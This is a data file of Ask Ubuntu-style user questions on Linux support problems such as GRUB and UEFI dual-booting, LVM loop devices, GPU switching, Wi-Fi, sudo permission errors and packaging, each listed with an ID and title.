276916	magnet links in opera	i know you can open .torrent files using opera , but not magnet protocol links . i have tried `` opera > settings > preferences > advanced > programs > add > protocol '' and typed `` magnet '' , but i do n't know what to put in `` open with other application '' . i do n't want to install a bittorrent client . how does this work ?
276923	how can i fix the missing /nst/autoneogrub0.mbr error on windows 8 ?	i have installed ubuntu 12.10 onto my windows 8 uefi hp pavilion g6 laptop . i installed ubuntu by clicking 'something else ' in the installation window . i then made 4 partitions : /boot , / , /home and a swap partition . it installed without a hitch , and it booted straight into windows 8 . because i knew windows 8 would n't find ubuntu , i used easybcd to add the os to the boot list . when i boot , it comes up with the boot manager , showing windows 8 and ubuntu . i can boot into 8 perfectly fine , but when i try to boot into ubuntu it comes up with a 0xc000007c error saying that /nst/autoneogrub0.mbr is missing or corrupt . it 's definitely in there , as i have checked . also i have already run the recommended fix on boot repair using the live cd . could somebody please help me out with this ? i 'm getting nowhere . thanks in advance
276924	live usb instructions for mac do n't work for 12.10	the are several guides online ( including a few on the ubuntu website ) that follow the general pattern of instructions found in this one . i assume that at some point , this worked . however , on an intel imac 5.1 with ubuntu 12.10 , it does not work . each command executes successfully , but the result is a drive that will not boot . holding alt during the boot , as the guide suggests , brings up a menu that does not include the usb drive . alternately , booting into refit or refind does in fact show the device , but refuses to boot , producing the error message : error : not found from locatedevicepath ( x 9 times ) error : load error while ( re ) opening our installation volume the firmware refused to boot from the selected volume . note that external hard drives are not well-supported by appleâ´s firmware for legacy os booting perhaps the guide needs to be updated ? i 'm not sure what to try differently here . edit : this is apparently not limited to 12.10 . i just had the same issue occur with 12.04.2 . edit : i get the same issue ( `` refused to boot '' ) following these instructions : http : //userpages.uni-koblenz.de/~ceinig/howto/artikel.php ? id=92
276925	sudo fab deps_local	i executed sudo fab deps_local in ubuntu 's terminal and got the following output : [ localhost ] local : sudo easy_install pip searching for pip reading http : //pypi.python.org/simple/pip/ reading http : //www.pip-installer.org reading http : //pip.openplans.org best match : pip 1.3.1 downloading http : //pypi.python.org/packages/source/p/pip/pip- 1.3.1.tar.gz # md5=cbb27a191cebc58997c4da8513863153 processing pip-1.3.1.tar.gz writing /tmp/easy_install-u4gcui/pip-1.3.1/setup.cfg running pip-1.3.1/setup.py -q bdist_egg -- dist-dir /tmp/easy_install-u4gcui/pip- 1.3.1/egg-dist-tmp-_xmcut warning : no files found matching '*.html ' under directory 'docs' warning : no previously-included files matching '*.txt ' found under directory 'docs/_build' no previously-included directories found matching 'docs/_build/_sources' adding pip 1.3.1 to easy-install.pth file installing pip script to /usr/local/bin installing pip-2.7 script to /usr/local/bin installed /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg processing dependencies for pip finished processing dependencies for pip [ localhost ] local : sudo pip install virtualenv downloading/unpacking virtualenv downloading virtualenv-1.9.1.tar.gz ( 2.0mb ) : 45kb downloaded exception : traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/basecommand.py '' , line 139 , in main status = self.run ( options , args ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1- py2.7.egg/pip/commands/install.py '' , line 266 , in run requirement_set.prepare_files ( finder , force_root_egg_info=self.bundle , bundle=self.bundle ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/req.py '' , line 1033 , in prepare_files self.unpack_url ( url , location , self.is_download ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/req.py '' , line 1161 , in unpack_url retval = unpack_http_url ( link , location , self.download_cache , self.download_dir ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/download.py '' , line 554 , in unpack_http_url download_hash = _download_url ( resp , link , temp_location ) file `` /usr/local/lib/python2.7/dist-packages/pip-1.3.1-py2.7.egg/pip/download.py '' , line 458 , in _download_url chunk = resp.read ( 4096 ) file `` /usr/lib/python2.7/socket.py '' , line 380 , in read data = self._sock.recv ( left ) file `` /usr/lib/python2.7/httplib.py '' , line 561 , in read s = self.fp.read ( amt ) file `` /usr/lib/python2.7/socket.py '' , line 380 , in read data = self._sock.recv ( left ) file `` /usr/lib/python2.7/ssl.py '' , line 241 , in recv return self.read ( buflen ) file `` /usr/lib/python2.7/ssl.py '' , line 160 , in read return self._sslobj.read ( len ) sslerror : the read operation timed out storing complete log in /home/asus/.pip/pip.log fatal error : local ( ) encountered an error ( return code 2 ) while executing 'sudo pip install virtualenv' aborting . asus @ ubuntu : ~/adl_lrs $ it seems that the code sudo fab deps_local did not work well . am i right ? if so , what should i do ?
276932	how to fix error after a release-update to ubuntu 12.10 ?	i have freshly reinstalled 12.10 and have not updated . after the last update on about march 26th i started getting usr/share/apport/apport-gpu-error-intel.py errors . reinstalled and updated same thing , so now i 'm not updating and have no issues . i am running a lenovo g570 with intel i3 and 2000 graphics . how can i find out when this bug has been repaired and know i can start to update 12.10 again ?
276937	how to efficiently enable/disable gui in ubuntu server 12.04 ?	i am using ubuntu server 12.04 and i intend to use some graphical tools to administrate the server . that 's why in installed ubuntu-desktop . sudo apt-get install ubuntu-desktop and enable it with startx however , as soon as i finish with the administration i would like to disable it without leaving background processes consuming the cpu . how can i achieve this ?
276941	how to disable ati 6490m and only use intel hd	i have a probook 4530s and just installed ubuntu a week ago . this laptop has both an ati 6490m graphics chipset and integrated intel hd graphics . the ati graphics seem to overheat the system , resulting in freezes . how can i disable the ati and use the integrated intel hd 3000 instead ? i do n't need the ati in for ubuntu , just for gaming in windows 7 . bios is no option because i do n't want to enable and disable the graphic all the time i 'm switching between windows and ubuntu .
276944	webmin port forwarding	i have not been able to figure this out at all . i have 1 lan ip address and 5 external static ips : eth0 : 10.0.0.1 - internal lan ip and router ip . eth1 : xx.xx.xx.217 - external eth2 : xx.xx.xx.218 - external eth3 : xx.xx.xx.219 - external eth4 : xx.xx.xx.220 - external eth5 : xx.xx.xx.221 - external currently outgoing traffic is is defaulting to use eth4 . currently i am using webmin . postrouting eth0 eth4 and eth1 for masquerade . currently i want to forward web traffic from port 80 to ip 10.0.1.220 . web traffic only comes in on eth1 and nothing else , so i want the rule to apply to only that interface . i am sure this is possible , i just do n't know how . any help would be appreciated . i have looked at guides and googled this but i ca n't find anything on multiwan solutions . let me know if you need any more information from me . also i have business class internet so they are not blocking any traffic at all .
276945	how to change frequency of old monitor compaq p75 in 12.04	unable to modify frequency of tube monitor compaq p75 , monitor should work at 85 hz ( 1024*768 ) bud does only 60 hz . graphic : radeon 7500 ati rv200 .
276949	skype 4.1.0.20 - pulseaudio is correctly set , but the microphone does n't work	i mentioned that my skype records during testcall the system intern sounds but not my voice . in the soundsettings i have no panel for configuration . if i make a test with sound recorder , it works fine . i can hear my voice .
276951	help me understand lvm initial setup loop device	i have a ( very ) rough understanding of what lvm is , i 'm finding it a little hard to grasp loop devices however . anyway here 's my issue : someone ran an ubuntu server install for me and probably went with whatever default lvm setup was offered . and i am now needing to fix this . the server has two 146gb physical drives . the original intention was to set a raid-1 with roughly 100gb space on one partition . instead i have a mess to sort out . here 's some information : fdisk -l ( not very clear , see next ) : disk /dev/sda : 146.8 gb , 146778685440 bytes 255 heads , 63 sectors/track , 17844 cylinders , total 286677120 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006e6c2 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 286676991 143087617 5 extended /dev/sda5 501760 286676991 143087616 8e linux lvm disk /dev/mapper/nmk203-root : 77.8 gb , 77791756288 bytes 255 heads , 63 sectors/track , 9457 cylinders , total 151937024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/nmk203-root does n't contain a valid partition table disk /dev/mapper/nmk203-swap_1 : 68.7 gb , 68706893824 bytes 255 heads , 63 sectors/track , 8353 cylinders , total 134193152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/nmk203-swap_1 does n't contain a valid partition table disk /dev/mapper/loop0p1 : 20.0 gb , 19998967808 bytes 255 heads , 63 sectors/track , 2431 cylinders , total 39060484 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/loop0p1 does n't contain a valid partition table disk /dev/mapper/loop0p2 : 1023 mb , 1023410176 bytes 255 heads , 63 sectors/track , 124 cylinders , total 1998848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/loop0p2 does n't contain a valid partition table disk /dev/mapper/loop2p1 : 20.0 gb , 19998967808 bytes 255 heads , 63 sectors/track , 2431 cylinders , total 39060484 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/loop2p1 does n't contain a valid partition table disk /dev/mapper/loop2p2 : 1023 mb , 1023410176 bytes 255 heads , 63 sectors/track , 124 cylinders , total 1998848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/loop2p2 does n't contain a valid partition table parted /dev/sda print all : model : hp logical volume ( scsi ) disk /dev/sda : 147gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 147gb 147gb extended 5 257mb 147gb 147gb logical lvm model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/loop2p2 : 1023mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 1023mb 1023mb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/loop2p1 : 20.0gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 20.0gb 20.0gb ext4 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/loop0p2 : 1023mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 1023mb 1023mb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/loop0p1 : 20.0gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 20.0gb 20.0gb ext4 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/nmk203-swap_1 : 68.7gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 68.7gb 68.7gb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/nmk203-root : 77.8gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 77.8gb 77.8gb ext4 fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/nmk203-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sdb1 during installation uuid=26b5157b-8db8-47f3-a8ec-398e92d5e4cf /boot ext2 defaults 0 2 /dev/mapper/nmk203-swap_1 none swap sw 0 0 mount : /dev/mapper/nmk203-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) cgroup on /sys/fs/cgroup type tmpfs ( rw , relatime , mode=755 ) cgroup on /sys/fs/cgroup/cpuset type cgroup ( rw , relatime , cpuset ) cgroup on /sys/fs/cgroup/cpu type cgroup ( rw , relatime , cpu ) cgroup on /sys/fs/cgroup/cpuacct type cgroup ( rw , relatime , cpuacct ) cgroup on /sys/fs/cgroup/memory type cgroup ( rw , relatime , memory ) cgroup on /sys/fs/cgroup/devices type cgroup ( rw , relatime , devices ) cgroup on /sys/fs/cgroup/freezer type cgroup ( rw , relatime , freezer ) cgroup on /sys/fs/cgroup/blkio type cgroup ( rw , relatime , blkio ) /dev/sda1 on /boot type ext2 ( rw ) /dev/dm-2 on /tmp/tmpq2vq64 type ext4 ( rw ) /dev/dm-4 on /tmp/tmptlvpgg type ext4 ( rw ) df -h : filesystem size used avail use % mounted on /dev/mapper/nmk203-root 72g 5.1g 63g 8 % / udev 32g 4.0k 32g 1 % /dev tmpfs 13g 316k 13g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 32g 0 32g 0 % /run/shm cgroup 32g 0 32g 0 % /sys/fs/cgroup /dev/sda1 228m 54m 162m 25 % /boot /dev/loop1 19g 630m 17g 4 % /tmp/tmpq2vq64 /dev/loop3 19g 630m 17g 4 % /tmp/tmptlvpgg so my first question is . what are these loop devices mounted in the /tmp folder ? can i simply remove them and use that space in / ( or not because of swap etc.. etc.. ) ? how would i go about reducing other paritions to add space to / ( and eventually work my way into the original raid-1 plan ) ? i 'd rather avoid a reinstall at this point ( if possible ) . thanks in advance
276960	hardware compatibility on ubuntu 12.04 lts	i 'm looking to update my pc with new hardware , currently i 'm running windows 7 and ubuntu 12.04 lts with dual boot . i have this hardware in mind : motherboard : asrock z77 extreme4 cpu : intel core i5 2500k 3.3ghz box socket 1155 ram : g.skill ripjawsz ddr3 2400 pc3-19200 16gb 4x4gb cl10 i have read that there are some problems with ivy/sandy bridges and uefi motherboards , are they fixed in 12.04 ? will it work ? any thoughts ? cheers .
276962	what 's the easiest way to package files into a deb ?	i have a bunch of static web files that change from time to time . right now i 'm syncing my servers up using rsync , but i 'd instead like to add scripts to my git repository so that when changes are made , devs can quickly turn the static files into a deb , upload them to our apt repo , and then push an update out to the servers . this is new to me . all of the tutorials that i 've found focus on compiling code and dependencies , but i do n't need that complexity . what 's the quickest toolset that we can use to quickly package our static content into a deb ?
276965	how to make terminal shortcut with this code in it ?	hi i am not good at terminal shortcuts or anything like that but if someone can give me instructions to make these to commands to a shortcut that will be awesome cd `` /home/owner/.wine/dosdevices/c : /program files/riot games/league of legends/rads/system '' and winedebug=+ntdll wine `` rads_user_kernel.exe '' run lol_launcher $ ( ls ../projects/lol_launcher/releases/ ) lollauncher.exe
276972	how to reallocate space from /home to /root with encrypted partitions ?	my computer is dual booting windows 7 and ubuntu ( 12.04 ) . my ubuntu partition has an encrypted root and home . the trouble is that for a while the /root partition has been almost full ( 94 % to 98 % . i have n't been able to run updates without being very selective because of the lack of space.i try to clean up the root directory , but it never clears up more than 100 or so mb of memory . the /root partition has 5.5gb of space , which is apparently not enough , although it is more than what was recommended by a guide i originally used . basically , i have tons of free space on my /home and i 'd like to shrink it and reallocate the free memory to the /root . i ca n't figure out how to deal with the resizing on encrypted partitions . additionally , i do have a good amount of completely unallocated space ( about 25gb ) available , so if adding some of that to the /root is an easier process , then some instruction on that would also be really helpful . i 'm still a beginner with linux , so clarity and details ( & explanations ) would be much appreciated . lastly , i 've gone through the resizeencryptedpartitions post , but had trouble with adding the free space to the encrypted partition .
276973	windows 8 not booting from grub 2	i have done a fair amount of research , and started of by disabling the secure booting uefi settings as well as the intel smart boot . i partitioned the drive accordingly and when i restarted the computer it booted straight to ubuntu ( which was to be expected ) and after a boot-repair grub2 was working fine and showed the options for windows 8 . however , after selecting the win8 option , my machine just hangs up at the loading screen with sager logo . i have tried multiple resolves to no avail . the complete log url is : http : //paste.ubuntu.com/5686995/ update : i removed my second efi partition and windows is still stuck . i have tried bcdrrepair and chkdsk . i tried doing a repair with windows disk but it didnt work . i edited the grub file and manually put in a custom entry with a chainloader that should work and still no progress . when i boot it goes straight to windows re . i check the windows syslog and get a message : a patch is preventing the system from starting up . i also tried a different bootloader suggest by a comment and the same problem occurs . i have a 750gb mechanical drive ( sda1 ) and a 256 msata ( boot )
276974	how can i install ubuntu on a hp compaq 6910p ?	i downloaded ubuntu 12.10 , and ran the installer as shown in tutorial for putting it on a usb drive . i restarted computer , and set boot priority to usb-hdd as first . i restart , and it loads the purple screen with the little white thing at the bottom . i click enter , and it opens up the ubuntu install . i click install ubuntu on a hard-disk . i wait for 30 seconds until it brings up this black screen with all white text and a blinking underscore at the bottom . i have an hp compaq 6910p notebook . i have successfully installed older versions of ubuntu previously . i am doing this on a hard drive that has 70gb of space . i have not been able to find any logical answers on how to solve this .
276975	is it possible to key-bind the pasting of the x-clipboard ? how ?	i was wondering if it is possible to add a keybind to paste the x-clipboard in lubuntu . ( primary selection ) if possible to keybind it , would you still be able to use the middle-click too ? is there perhaps a clipboard manager that supports this ? thanks in advance , zarnaik edit : thanks to kupiakos for providing a solution . i have not tested it in ubuntu , lubuntu only . this is how i did it . first run sudo apt-get install xsel xvkbd to install the necessary packages . then open the openbox configuration file as so gedit ~/.config/openbox/lubuntu-rc.xml replacing gedit by whatever text-editor you use . once inside the file look for the < keyboard > tag and add the below code . < keybind key= '' w-v '' > < action name= '' execute '' > < command > sh -c 'xsel | xvkbd -xsendevent -file - ' < /command > < /action > < /keybind > i configured it to work with super + v , but you can easily adjust that . save the file and make openbox notice the change by executing openbox -- reconfigure that 's all there is to it . again thanks to kupiakos for providing the command that i still fail to understand .
276976	can ubuntu 64 bit run ubuntu 32 application ?	can ubuntu 64 bit run ubuntu 32 application ? now all our pcs and laptop are i7 , 16gb memory .
276981	genius gx gila mouse	so i have a genius gx gila gaming mouse . it does n't work . having previously had arch installed and running various troubleshooting steps i came to the conclusion that linux detects it as a keyboard . the mouse has various macro keys which i would hazard a guess at being picked up as the keyboard component . now i 'm not too fussed about getting those to work in ubuntu but it would be nice to operate it simply as a mouse . this is the output of lsusb . bus 001 device 002 : id 0409:005a nec corp. highspeed hub bus 002 device 004 : id 05e3:0716 genesys logic , inc. usb 2.0 multislot card reader/writer bus 004 device 002 : id 045e:028e microsoft corp. xbox360 controller bus 005 device 002 : id 046d:0a0b logitech , inc. clearchat pro usb bus 007 device 002 : id 046d : c52b logitech , inc. unifying receiver **bus 007 device 004 : id 0458:0138 kye systems corp. ( mouse systems ) ** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub its the kye systems corp. line . this is a snippet of dmesg . [ 1019.332966 ] input : genius gila gaming mouse as /devices/pci0000:00/0000:00:16.0/usb7/7-3/7-3:1.1/input/input17 [ 1019.333236 ] hid-generic 0003:0458:0138.000b : input , hidraw4 : usb hid v1.11 keyboard [ genius gila gaming mouse ] on usb-0000:00:16.0-3/input1 [ 1019.338725 ] hid-generic 0003:0458:0138.000c : hiddev0 , hidraw5 : usb hid v1.11 device [ genius gila gaming mouse ] on usb-0000:00:16.0-3/input2 as you can see it thinks it 's a keyboard . i have found a similar problem with a sharkoon drakonia which someone on arch managed to fix by substituting the device id into x 's input file . this however seems to have me stumped and i can not find out how to this , if anyone could advise i would be most grateful !
276983	cant disable , control keyboard backlight on sony vaio vpcf236fm	hello i have a sony vaio vpcf236fm . i am unable to disable or control my keyboard backlight . i want to be able to disable it when im running on the battery . please if i could get help with this id be in your debt .
276986	12.04 boot issue : black screen possibly relate to hibernation	i am new to linux and have recently set up a dual boot with windows 7 on my lenovo w530 ( 8gb ram ) . during the partitioning phase of setting up my dual boot i noticed there was a 8gb partition set aside for hibernation . apparently this is a regular situation faced by those wishing to partition a ssd . anyway , the installation of ubuntu 12.04 64bit went ahead and everything had been relatively smooth over the last few days whilst i downloaded and installed the software i required . i must admit as a noob , i felt i was copying and pasting a lot of terminal commands that might have altered the internal dynamics of the computer in ways i could not comprehend . however , this process was mostly successful . after setting up most of the software i turned my attention to the hibernation function , as i thought it would be a waste of 8gb on my ssd if it was not utilised on ubuntu . after reading the forums , i found that the function for hibernate had been hidden due to instability issues . i pressed ahead and followed the instructions to reenable it . this was successful . however , i noticed that on shutdown or restart , the computer would hang on a black screen in the final stages of the shutdown process . it required me to long press the power button to turn off the machine . this morning i tried to boot the computer and found that the computer now hangs on a black screen after selecting ubuntu in grub . long pressing the power button loads the ubuntu shutting down screen ( loading dot animation ) , but sometimes this also leads to another black screen . after this i booted the machine and selected the recovery menu , and after trying to boot it as a 'regular ' session , the machine does not recognise my login ( or maybe i am mistaken ? ? ) . my first attempt at selecting the recovery menu showed a message : ata_id [ 878 ] : hdio_get_identity failed for '/dev/sbd ' : invalid . although the problem persists , this message is not shown anymore . i tried boot repair however this also failed to resolve the issue . fyi the message after completing boot repair was : http : //paste2.org/p/3482165 feeling very lost right now ! please help !
276987	new ubuntu installation is too slow	i downloaded ubuntu because my windows xp pro computer crashed . it was not recoverable because the computer was given to me without backup disks . it is a cisnet with a msi motherboard pentium 4 with 756 mib of ram . ubuntu does not recognize the video hardware . i have a handful of video cards should i try each one ? is the problem in the ram or the video card ? please help , as my computer is too slow for me to use well .
276989	wlan0 gets an ip , but ca n't access the internet ( or ping the router )	i 'm using ubuntu 12.10 . i can access the internet without problem at work via wi-fi , and i used to do that at home , but my internet provider changed my modem ( which now has a native router ) and things got a little bit weird.. i still can connect to my home network , my wlan0 interface gets an ip as it should , but i ca n't browse any websites or ping to any google servers ; actually , i ca n't even ping my router . with my phone and with another notebook ( windows 7 ) i can access the internet via wi-fi without problems . when i access the router with the windows note and browse the `` wireless client list '' tab , i do n't see my linux notebook . here 's some outputs : netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 ifconfig wlan0 link encap : ethernet hwaddr 9c:2a:70:89:7a:59 inet addr:192.168.0.5 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :9e2a:70ff : fe89:7a59/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11328 errors:0 dropped:0 overruns:0 frame:0 tx packets:13289 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8270439 ( 8.2 mb ) tx bytes:2182573 ( 2.1 mb ) lspci -nn | grep 0280 07:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 )
276991	how do i transfer temporary cd files to bootable usb ?	i created a cd with 12.04 and downloaded ( and installed ) a bunch of stuff . in ubuntu , ( running from the cd ) i created a bootable usb with 12.10 . how to i transfer my previously downloaded files to the usb ?
276995	how to use integrated gpu for hybrid laptop intel/ati ?	so here 's the problem , i have lenovo laptop y460 equipped with hybrid gpu that is an intel integrated gpu and an ati radeon hd 5650 as discrete gpu . basically i can switch the gpu either by switching the button in the laptop or directly from the software program . hxxp : //i.stack.imgur.com/xg6cu.png what annoy me is when i install ubuntu as dualboot alongside my windows 7 , and once i boot to ubuntu ; the discrete gpu turn on automatically . i do n't like it cause i do n't need it and the worst is it could drain my battery and overheat my laptop till it get shut down automatically . so what did i do ? i read a ton of post/article about this switching thing . this led me try these `` how-to in step by step '' hxxp : //ubuntuforums.org/showthread.php ? t=1930450 hxxp : //wiki.cchtml.com/index.php/ubuntu_quantal_installation_guide i try to install ati catalyst driver 3 times but eventually it failed when i reboot it . the result is hxxp : //i.stack.imgur.com/y1a2s.jpg hxxp : //i.stack.imgur.com/8vqyh.jpg so i choose the first option `` running in low graphics session '' . but unfortunately when i got into desktop view , everything is blank including the dock and taskbar except the purple background color of ubuntu and the system also give a notice `` system is corrupt '' while for the case of `` linux mint '' , when i boot into linux mint - my view become command line interface instead of gui . the system also give a notice `` xor server fail to start '' . 2.another way is i try to switch off the discrete gpu from bios , but sadly there is no option for integrated gpu under the `` graphics tab '' . instead the option is only 2 , either switchable graphic or discrete gpu . so here i am , now i 'm stuck - do n't know what to do . could you help me how to solve it ? ( my purpose is i just want to use the integrated gpu ) . lenovo ideapad y460 specifications : 14.0 '' hd wide led 1366x768 windows 7 home premium 64-bit intel core i5 520m processor ( 2.40ghz , 3mb cache ) ati mobility radeon hd 5650 with 1gb vram and intel gma hd switchable graphics 4gb ddr3-1066 ram ( 2x 2gb ) 500gb 5400rpm hard drive ( seagate 5400.6 ) intel wireless wi-fi link 1000bgn built-in bluetooth v2.1+edr 8x dvd burner 6-cell li-ion battery ( 11.1v , 57wh ) weight : 4.98lbs dimensions : 13.4 x 0.79â1.3 x 9.25 inches
276997	removing all traces of edubuntu from my ubuntu install	hi i installed edubuntu desktop on ubuntu and have decided to get rid of it . there is no problem with the function of my desktop but i would like to know why after removing edubuntu there is still traces remaining . examples include dash symbol is edubuntu and all of the wallpaper selections remain . any one know how to completely remove edubuntu ? like i said there is no problem with function just would like to know if there is a way i could get back to what i had before . thank you for your time .
276998	ubuntu will run but wont install from disk	i downloaded ubuntu and burned to disk . booted up using the disk and ubuntu will load . but it wont install . i 'll click the install icon select my internet and click continue . then nothing . the hour glass goes and goes but nothing . i 'm using a dell inspiron 1545 . windows no longer works on this pc . i was trying to run ubuntu as a hassle free alternative .
277002	how to set permissions for shared folders	i could use some help setting permissions for a series of shared folders . say i have the following three folders : /xfer/joe /xfer/bob /xfer/sam joe should be able to read , write and delete files from /xfer/joe , and list , write but not read files from /xfer/bob and /xfer/sam . likewise , bob should be able to read , write , delete files from /xfer/bob , but only list and write ( not read ) from /xfer/joe and /xfer/sam . i can chmod and chown the folders , but how to set up so if bob drops a file into joe , joe retains ownership of the file . the users will sftp files in and out of the folders .
277005	boot sequence not finding grub on 12.10 server install	i downloaded the 12.10 server iso and used linux live usb to create a bootable stick . i used this stick to go through the install process . the target is a lenova q190 . the install process seemed to go fine and it got to the point where it said to remove the media and restart . when i did so the q190 reported : error 1962 : no operating system found . press any key to restart the boot process . the only thing i could think of was that it was the wrong iso . i had used the amd-64 and the q190 has dual celerons so i thought maybe i should be using the x86 image . i made a usb stick with that iso but that one wo n't even boot on the q190 so now i 'm unsure what try next . it seems to me that grub is n't being executed at all . i do n't know if it was n't installed into the boot sector or if it was installed incorrectly . any ideas ? *recent activity : i created a 12.4 cd and used a usb driver to boot off which worked well . i wanted to remove any fogginess on what the linux live usb stick might be doing and move to the older release to see what difference that made ( answer : none ) . it appears that grub is quite sure it is being installed on the mbr of /dev/sda but still the same result occurs . no operating system found .
277009	sudo : /usr/lib/sudo/sudoers.so must be owned by uid 0	whenever i try to do anything at all that requires my password it returns this : u7ur7l3 @ ubuntu : ~ $ sudo sudo : /usr/lib/sudo/sudoers.so must be owned by uid 0 sudo : fatal error , unable to load plugins u7ur7l3 @ ubuntu : ~ $ so i ca n't install anything from the software center / package manager or run any commands in terminal that require my password . i can log in , but that 's pretty much it . i accidentally changed the permissions of some files , then changed some more trying to fix it : / . now i 'm completely lost as to what to do . this is what happened when i tried to get sudo working again using pkexec : u7ur7l3 @ ubuntu : ~ $ pkexec chown root /usr/lib/sudo/sudoers.so error getting authority : error initializing authority : error calling startservicebyname for org.freedesktop.policykit1 : gdbus.error : org.freedesktop.dbus.error.spawn.execfailed : failed to execute program /usr/lib/dbus-1.0/dbus-daemon-launch-helper : success u7ur7l3 @ ubuntu : ~ $ sudo ls sudo : /usr/lib/sudo/sudoers.so must be owned by uid 0 sudo : fatal error , unable to load plugins and to change permissions i was using root actions as a dolphin service/ plugin thing , so history does n't show me the permission changes . i just realized that sounds do n't work at all anymore . when i go into phonon my default settings and playback devices are n't even there . also i do n't have the option to shutdown , i can only log out or leave .
277017	attemping to install ubuntu 12.10 onto uefi windows 8 asus laptop results in black screen after ¨try ubuntu without installing¨ and ¨install ubuntu¨	i´ve been trying to follow every guide i see about installing ubuntu onto a uefi laptop , but so far nothing has worked . basically i want to overwrite windows 8 with ubuntu , so i never have to see it again . i installed ubuntu 12.10 64 bit with pendrive onto a usb , went into the computer bios , set the usb drive as the priority , disabled fastboot and secure boot . i then get to a screen that gives the options ¨try ubuntu without installing¨ , ¨install ubuntu¨ and ¨check disk for defects¨ . it´s the kind of screen that´s a very basic black screen with those options , no ubuntu logo or any other options , except for going to the command line and etc . upon pressing any of the 3 options the screen then goes blank , with the backlight still on and continues to stay like that forever until i turn it off . i´ve tried everywhere to look for a solution , but most answers , including the nomodeset fix , can´t apply to this because there´s no available option for it . does anybody know what to do ?
277021	why is swappiness=10 recommended ?	a value of swappiness=10 is recommended in ubuntu 's swapfaq . why is a value of 10 is recommended rather than swappiness=0 ? are there any pros of 10 or cons of zero ?
